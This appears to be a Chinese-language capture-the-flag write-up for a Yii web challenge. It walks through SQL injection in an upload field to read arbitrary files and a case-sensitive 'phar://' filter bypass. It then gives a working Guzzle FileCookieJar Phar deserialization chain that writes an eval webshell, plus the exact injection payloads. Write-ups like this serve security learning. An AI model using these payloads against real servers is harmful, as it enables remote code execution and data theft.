Dockefile：

• https://github.com/SniperOJ/Jeopardy-Dockerfiles/tree/master/web/guzzle

信息搜集：

題目地址：http://58.20.46.148:21333/

1. 目標使用 Yii 框架開發
2. 存在登錄注冊功能
3. 登錄注冊以后解鎖新的功能：上傳文件（upload）、顯示文件（show）
   （contact 等其他功能為 Yii 腳手架自帶，不需要太過關心）
4. 上傳文件需要比正常的文件上傳多提供一個參數 name
5. 顯示文件不需要參數，如果正常上傳一張圖片則會直接顯示這個圖片，不需要添加參數，這個功能應該是調用了 php 的文件讀取函數。有兩點支撐這個觀點：
   1. 路徑中不需要指定文件名
   2. 用戶和用戶之間會隔離，瀏覽器隱身頁面訪問不到了
6. 存在 readme.md 提供了表結構，根據文件內容確定數據庫為 sqlite3

CREATE TABLE IF NOT EXISTS "users" (
  "id" integer PRIMARY KEY AUTOINCREMENT NOT NULL,
  "username" char(1024) NOT NULL,
  "password" char(1024) NOT NULL,
  "filepath" varchar(1024)
);

6. 上傳文件功能多的參數 name 處存在注入，一個單引號即可觸發，結合之前得到的表結構，猜想是讓用戶可以指定一個文件名用來保存，然后在訪問 show 路由的時候從用戶 session 中拿到 user 身份標識，然后從數據庫中查找文件路徑，然后讀取出來響應給客戶端
7. 上傳成功后會顯示服務器的一個相對路徑

$filepath = '../uploads/'.$_POST['UploadForm[name]'].'.';
$filepath .= pathinfo($_FILES['UploadForm[imageFile]']['name'], PATHINFO_EXTENSION);
echo $filepath;

8. 猜測服務器會將 $filepath 作為文件名傳入讀取文件類的函數，如果 $filepath 可以任意控制的話就可以讀取 php 文件了，但是題目檢測 $_POST['UploadForm[name]'] 中是不是存在 ph，如果存在上傳失敗。
9. 一個用戶只能有一個 filepath，因此猜測上傳功能肯定是一條 update 語句，因此存在"SQL 字段覆蓋問題"（不知道這種說法是不是準確，筆者只是不知道如何描述這樣的問題，姑且成為“字段覆蓋”吧），更新的字段為 filepath，那如果傳入多個 filepath 則最終生效的為最后一個，這樣應該就可以通過絕對路徑讀取文件了，但是根據第七步推測到的偽代碼，filepath 最后會加上 ‘.’ 和上傳文件的擴展名，這里的讀取文件好像有點問題，暫時不能讀取 php 文件，嘗試讀取 /etc/apt/sources.list 成功

UploadForm[name]=',filepath='/etc/apt/source
filename=lilac.list

10. 既然可以多添加一個字段，再添加一個字段不就不用考慮后綴名的問題了

UploadForm[name]=',filepath='/etc/apache2/sites-enabled/000-default.conf',username='lilac
filename=whatever

<VirtualHost *:80>
    ...
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html/You_Cant_Gu3ss/web
    ...
</VirtualHost>

11. 得到 web 絕對路徑并且可以任意文件讀取之后就可以對照著 Yii 的腳手架代碼來一步步下載源碼了
    以下貼出關鍵代碼

?  controllers cat UsersController.php 
<?php

namespace app\controllers;

use Yii;
use app\models\Users;
use app\models\UsersSearch;
use yii\web\Controller;
use yii\web\NotFoundHttpException;
use yii\filters\VerbFilter;
use app\models\UploadForm;
use yii\web\UploadedFile;

/**
 * UsersController implements the CRUD actions for Users model.
 */
class UsersController extends Controller
{

    public function actionFile()
    {
        if (!Yii::$app->session->get('id')) {
            return $this->redirect(['site/index']);
        }
        $model = new UploadForm();

        if (Yii::$app->request->isPost) {
            $model->imageFile = UploadedFile::getInstance($model, 'imageFile');
            $model->name = Yii::$app->request->post('UploadForm')['name'];
            if ($path = $model->upload()) {
                $filename = $path;
                $sql = 'update users set filepath = \''.$filename.'\' where id = '.Yii::$app->session->get('id');
                Yii::$app->db->createCommand($sql)->execute();
                \Yii::$app->getSession()->setFlash('success', "File upload Success! path is ../uploads/".$model->name.'.'.$model->imageFile->extension);
                return $this->render('file', ['model' => $model]);
            }
        }

        return $this->render('file', ['model' => $model]);
    }

    public function actionShow(){
        if (!Yii::$app->session->get('id')) {
            return $this->redirect(['site/index']);
        }
        $model = Users::find()->where(['id'=>Yii::$app->session->get('id')])->one();
        if (!$model->filepath){
            \Yii::$app->getSession()->setFlash('error', "You should upload your image first");
            return $this->redirect(['file']);
        }
        if (substr($model->filepath, 0,7)=='phar://') {
            \Yii::$app->getSession()->setFlash('error', "no phar! ");
            return $this->redirect(['file']);
        }
        $content = @file_get_contents($model->filepath);
        header("Content-Type: image/jpeg;text/html; charset=utf-8");
        echo $content;
        exit;
    }
}

12. 判斷了 filepath 是不是以 phar:// 開頭，但是 php 在實現上讀取文件的 wrapper name 是可以不區分大小寫的

readfile("PHP://FILTER/convert.BASE64-ENCODE/resource=/etc/hostname");
readfile("FILE:///etc/hostname");

12. 回過頭來想想，目前情景很符合對象注入的場景

1. 框架代碼（大量 Gadget 可用）
2. 服務器已知文件內容可控
3. 文件讀取函數的文件路徑參數可控

13. 根據代碼其實也可以反應出來是 Phar 反序列漏洞
14. 根據提示 guzzle，在 composer.json 中得到 guzzle 的版本，搜索該版本的 Object Injection 即可

關鍵思路：

vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php
存在可控的文件寫操作，考慮使用該類反序列化寫 shell

1. 構造 POP 鏈
2. 生成以 POP 鏈為 Metadata 的 Phar 文件

<?php
require __DIR__ . '/vendor/autoload.php';
use GuzzleHttp\Cookie\FileCookieJar;
use GuzzleHttp\Cookie\SetCookie;
$payload = '<?php eval($_REQUEST[1])?>';
$obj = new FileCookieJar('/var/www/html/You_Cant_Gu3ss/web/assets/lilac.php');
$c = new SetCookie([
    'Name' => 'foo',
    'Value' => 'bar',
    'Domain' => $payload,
    'Expires' => time()+0x100,
    'Discard' => false,
]);
$obj->setCookie($c);

$data = serialize($obj);
print_r($data);
file_put_contents("poc.dat", $data);

$phar_filename = "lilac.phar";
@unlink($phar_filename);
$phar = new Phar($phar_filename);
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($obj);
$phar->addFromString("lilac", "lilac");
$phar->stopBuffering();

3. 上傳 Phar 文件
4. 通過任意文件讀取漏洞使用 Phar 協議讀取觸發反序列化操作寫 Webshell

UploadForm[name]=1',filepath='Phar:///var/www/html/You_Cant_Gu3ss/uploads/lilac.jpg/lilac',username='lilac

5. 反序列化并成功標志為讀取到 Phar 文件內容：lilac

坑點：

• php 序列化數據里面會有 \x00 所以復制的時候會被坑，應該直接寫文件里
• Yii 腳手架的 ${ROOT}/web/assets 目錄是可寫的
• 關于如何構造 POP 鏈請見參考資料中第一條 PDF，近期看到的最棒的 Presentation 了

參考資料：

• https://www.insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf
• https://github.com/ambionics/phpggc
• https://paper.seebug.org/680/
• http://php.net/manual/en/language.oop5.decon.php